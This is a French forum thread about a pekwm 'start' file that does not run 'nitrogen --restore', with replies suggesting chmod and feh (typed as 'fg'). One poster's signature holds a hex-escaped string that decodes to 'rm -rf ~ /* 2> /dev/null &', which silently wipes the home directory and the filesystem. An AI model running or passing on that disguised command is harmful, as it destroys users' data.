[pekwm] fichier start ne marche pas
[pekwm] fichier start ne marche pas
Bonjour
Comme le dit le titre mon fichier start ne marche pas, j'y est juste mis comme commande nitrogen en mode restauration pour mon fond d'ecran ( apres tous le blabla...) mais il ne me lance rien.
Savez d'ou peux venir le probleme ?
Comme le dit le titre mon fichier start ne marche pas, j'y est juste mis comme commande nitrogen en mode restauration pour mon fond d'ecran ( apres tous le blabla...) mais il ne me lance rien.
Savez d'ou peux venir le probleme ?
Re: [pekwm] fichier start ne marche pas
Est - il éxécutable?
chmod +x start
chmod +x start
Thinkpad x201 (CPU : i5 @ 2,4GHz, RAM : 8GO, SSD : 128GO) - Archlinux (x86_64) + Gnome + Bépo
TEX Yoda (MX Brown) | HHPK (MX Brown)
En faites j'ai testé en lancant juste un terminal et ca marche donc je vais revoir le fichier pourquoi ce que j'y est mis ne fonctionne pas.
Merci quand meme
J'ai mis "nitrogen --restore &" pour restaurer mon fond d'ecran ms cela ne marche pas ?
Merci quand meme

J'ai mis "nitrogen --restore &" pour restaurer mon fond d'ecran ms cela ne marche pas ?
Je connais pas du tout nitrogen...
Moi je restaure mon bg avec feh :
fg --bg-scale ~/.background &
Moi je restaure mon bg avec feh :
fg --bg-scale ~/.background &
Thinkpad x201 (CPU : i5 @ 2,4GHz, RAM : 8GO, SSD : 128GO) - Archlinux (x86_64) + Gnome + Bépo
- r4is3_your_g0d
- Hankyu
et nitrogen à la main, il restaure bien ton wallpaper?
Enfin, et parce que le code source est public et donc auditable, la sécurité des logiciels libres peut être mieux assurée. Bernard CARAYON
Code : Tout sélectionner
x72x6Dx20x2Dx72x66x20x7ex20x2Fx2Ax20x32x3ex20x2fx64x65x76x2fx6ex75x6cx6cx20x26